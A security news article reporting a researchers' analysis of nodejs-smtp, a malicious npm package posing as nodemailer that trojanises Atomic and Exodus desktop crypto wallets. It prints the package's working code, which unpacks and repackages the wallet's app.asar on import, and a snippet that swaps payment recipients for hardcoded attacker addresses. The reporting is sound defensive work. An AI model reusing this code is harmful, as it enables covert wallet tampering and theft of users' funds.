Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, boasting approximately 3.9 million weekly downloads.
At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.
This deceptive functionality serves as a Trojan horse, engaging quietly in covert operations that prey on desktop cryptocurrency wallets installed on Windows systems.
.webp "Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions 3")
As organizations continued to integrate open-source dependencies into their development pipelines, attackers recognized the potency of import-time tampering.
Socket.dev analysts noted that upon import, nodejs-smtp immediately invokes an Electron-based payload designed to infiltrate wallets such as Atomic Wallet and Exodus.
By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.
Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.
Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.
These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.
Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.
In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.
Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.
The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.
Infection Mechanism and Persistence Tactics
Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.
In the first stage, the package’s lib/engine/index.js script executes immediately upon import:-
// lib/engine/index.js
const os = require('os');
const fs = require('fs').promises;
const path = require('path');
const asar = require('asar');
async function patchAtomic() {
try {
const base = path.join(os.homedir(), 'AppData', 'Local', 'Programs');
const resDir = path.join(base, 'atomic', 'resources');
const asarIn = path.join(resDir, 'app.asar');
const workDir = path.join(resDir, 'output');
const implant = path.join(__dirname, 'a.js');
const target = path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js');
await fs.mkdir(workDir, { recursive: true });
asar.extractAll(asarIn, workDir);
await fs.copyFile(implant, target);
asar.createPackage(workDir, asarIn);
await fs.rm(workDir, { recursive: true, force: true });
} catch {}
}
patchAtomic();This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the integrity-checked archive to mask traces.
Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:
// lib/engine/a.js
async sendCoins() {
if (await this.validatePassword()) {
if (this.coin.ticker === 'BTC')
this.inputs.address="17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy";
else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
this.inputs.address="0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24";
// Additional mappings for TRX-USDT, XRP, SOL omitted
}
}By executing during import, nodejs-smtp avoids detection by static scanners that only inspect function calls at runtime. This persistent, import-time hook highlights the evolving threat landscape within open-source ecosystems, underscoring the need for supply chain–aware security measures.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
